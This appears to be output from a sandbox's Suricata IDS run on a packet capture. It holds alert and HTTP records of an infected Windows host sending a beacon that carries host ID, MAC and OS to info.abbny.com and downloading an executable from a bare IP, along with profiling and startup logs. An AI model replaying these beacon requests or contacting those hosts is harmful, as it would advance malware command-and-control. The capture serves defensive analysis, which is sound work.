{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":1348125443758169,"pcap_cnt":141,"event_type":"alert","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":1348125443758169,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:36.274606+0000","flow_id":1348125443758169,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"45.79.77.20","src_port":80,"dest_ip":"192.168.240.16","dest_port":49429,"proto":"TCP","http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"https:\/\/jsonip.com\/","length":194},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":194,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.352934+0000","flow_id":619544371534840,"pcap_cnt":144,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49762,"proto":"UDP","dns":{"type":"answer","id":43817,"rcode":"NOERROR","rrname":"info.abbny.com","rrtype":"A","ttl":21599,"rdata":"153.92.4.49"}}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1132157308266039,"pcap_cnt":155,"event_type":"alert","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1132157308266039,"pcap_cnt":155,"event_type":"http","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png"}}
{"timestamp":"2019-03-29T09:49:36.712023+0000","flow_id":1132157308266039,"pcap_cnt":156,"event_type":"fileinfo","src_ip":"153.92.4.49","src_port":80,"dest_ip":"192.168.240.16","dest_port":49430,"proto":"TCP","http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":259},"app_proto":"http","fileinfo":{"filename":"\/e.png","gaps":false,"state":"CLOSED","stored":false,"size":259,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.824279+0000","flow_id":1016128766765503,"pcap_cnt":164,"event_type":"tls","src_ip":"192.168.240.16","src_port":49431,"dest_ip":"45.79.77.20","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill","issuerdn":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill"}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019714,"rev":10,"signature":"ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-03-29T09:49:37.297976+0000","flow_id":1402439600033560,"pcap_cnt":216,"event_type":"alert","src_ip":"27.102.130.126","src_port":

This file has been truncated. Go here to download in full.


keyword_perf.log - (16013 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 6/28/2019 -- 02:55:17
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            72167165        20483           20483           11628439        3523.00         3523.00         0.00           
  flow             86907169        26186           26186           4785354         3318.00         3318.00         0.00           
  threshold        70414884        20483           7               2635754         3437.00         5167.00         3437.00        
  content          43403496        3184            511             6564414         13631.00        40103.00        8571.00        
  pcre             545993          70              11              83441           7799.00         4543.00         8406.00        
  byte_test        294205          88              58              6077            3343.00         3439.00         3157.00        
  byte_jump        221808          67              25              5340            3310.00         3309.00         3311.00        
  isdataat         27478           9               1               3634            3053.00         3634.00         2980.00        
  flowbits         16232787        2871            73              6894325         5654.00         3344.00         5714.00        
  urilen           67512           21              8               4045            3214.00         3305.00         3158.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            72167165        20483           20483           11628439        3523.00         3523.00         0.00           
  flow             86907169        26186           26186           4785354         3318.00         3318.00         0.00           
  flowbits         16200790        2865            67              6894325         5654.00         3166.00         5714.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11224150        1261            159             137265          8900.00         9762.00         8776.00        
  pcre             279798          36              5               83441           7772.00         3651.00         8436.00        
  byte_test        286644          86              58              6077            3333.00         3439.00         3112.00        
  byte_jump        202189          61              19              5340            3314.00         3322.00         3311.00        
  isdataat         27478           9               1               3634            3053.00         3634.00         2980.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         31997           6               6               7534            5332.00         5332.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        70414884        20483           7               2635754         3437.00         5167.00         3437.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          361520          89              49              5509            4062.00         4039.00         4089.00        
  pcre             185308          26              4               24066           7127.00         4962.00         7520.00        
  urilen           67512           21              8               4045            3214.00         3305.00         3158.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7717            2               2               4740            3858.00         3858.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          108078          16              4               15643           6754.00         14965.00        4018.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          31303           9               0               4444            3478.00         0.00            3478.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          31157928        1677            214             6564414         18579.00        85710.00        8759.00        
  byte_test        7561            2               0               4244            3780.00         0.00            3780.00        
  byte_jump        19619           6               6               4752            3269.00         3269.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          270981          64              35              6261            4234.00         4429.00         3998.00        
  pcre             48053           5               1               11155           9610.00         6859.00         10298.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          111018          30              23              4792            3700.00         3740.00         3570.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_connection
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12723           4               0               3479            3180.00         0.00            3180.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6006            1               0               6006            6006.00         0.00            6006.00        
  pcre             20241           1               0               20241           20241.00        0.00            20241.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          33853           9               8               4404            3761.00         3837.00         3157.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          29341           8               4               4566            3667.00         3956.00         3379.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          38023           11              11              4224            3456.00         3456.00         0.00           
  pcre             12593           2               1               7578            6296.00         5015.00         7578.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3386            1               0               3386            3386.00         0.00            3386.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7469            2               2               4137            3734.00         3734.00         0.00           


IDSDeathBlossom.py.log - (1150 bytes) - download
1
2
3
4
5
6
7
8
2019-06-28 02:55:07,279 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-06-28 02:55:08,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-06-28 02:55:08,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2019-06-28 02:55:08,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-06-28 02:55:08,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-06-28 02:55:08,038 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df5d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/04032019.1339-network.pcap -vvv -k none
2019-06-28 02:55:17,627 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-06-28 02:55:17,627 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 10.3582279682


suricata-report-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (18074 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df5d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/04032019.1339-network.pcap -vvv -k none
elapsedtime:9.586991
stderr:
stdout:
28/6/2019 -- 02:55:08 - <Info> - Configuration node 'rule-files' redefined.
28/6/2019 -- 02:55:08 - <Notice> - This is Suricata version 4.0.0 RELEASE
28/6/2019 -- 02:55:08 - <Info> - CPUs/cores online: 1
28/6/2019 -- 02:55:08 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31513 and 'request-body-inspect-window' set to 16746 after randomization.
28/6/2019 -- 02:55:08 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32323 and 'response-body-inspect-window' set to 16656 after randomization.
28/6/2019 -- 02:55:08 - <Config> - DNS request flood protection level: 500
28/6/2019 -- 02:55:08 - <Config> - DNS per flow memcap (state-memcap): 524288
28/6/2019 -- 02:55:08 - <Config> - DNS global memcap: 16777216
28/6/2019 -- 02:55:08 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
28/6/2019 -- 02:55:08 - <Config> - preallocated 1000 hosts of size 136
28/6/2019 -- 02:55:08 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
28/6/2019 -- 02:55:08 - <Config> - using magic-file /usr/share/file/magic
28/6/2019 -- 02:55:08 - <Config> - Core dump size is unlimited.
28/6/2019 -- 02:55:08 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
28/6/2019 -- 02:55:08 - <Config> - preallocated 1000 defrag trackers of size 168
28/6/2019 -- 02:55:08 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
28/6/2019 -- 02:55:08 - <Config> - stream "prealloc-sessions": 2048 (per thread)
28/6/2019 -- 02:55:08 - <Config> - stream "memcap": 33554432
28/6/2019 -- 02:55:08 - <Config> - stream "midstream" session pickups: disabled
28/6/2019 -- 02:55:08 - <Config> - stream "async-oneside": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "checksum-validation": disabled
28/6/2019 -- 02:55:08 - <Config> - stream."inline": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "bypass": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "max-synack-queued": 5
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "memcap": 134217728
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "depth": 0
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "toserver-chunk-size": 2534
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "toclient-chunk-size": 2631
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly.raw: enabled
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "segment-prealloc": 2048
28/6/2019 -- 02:55:08 - <Config> - Delayed detect disabled
28/6/2019 -- 02:55:08 - <Config> - pattern matchers: MPM: ac, SPM: bm
28/6/2019 -- 02:55:08 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
28/6/2019 -- 02:55:08 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
28/6/2019 -- 02:55:08 - <Config> - prefilter engines: MPM
28/6/2019 -- 02:55:08 - <Config> - IP reputation disabled
28/6/2019 -- 02:55:08 - <Perf> - Registered 148 keyword profiling counters.
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
28/6/2019 -- 02:55:09 - <Config> - No rules loaded from ET-emerging-icmp.rules.
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
28/6/2019 -- 02:55:13 - <Config> - No rules loaded from local.rules.
28/6/2019 -- 02:55:13 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
28/6/2019 -- 02:55:13 - <Info> - Threshold config parsed: 0 rule(s) found
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tcp-packet
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tcp-stream
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for udp-packet
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for other-ip
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_uri
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_request_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_client_body
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_response_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header_names
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header_names
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept_enc
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept_lang
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_referer
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_connection
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_len
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_len
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_type
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_type
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_start
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_start
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_method
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_cookie
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_cookie
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_uri
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_user_agent
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_host
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_host
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_stat_msg
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_stat_code
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dns_query
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_sni
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_issuer
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_subject
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_serial
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_software
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_software
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for file_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for file_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_request_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_response_line
28/6/2019 -- 02:55:13 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
28/6/2019 -- 02:55:13 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
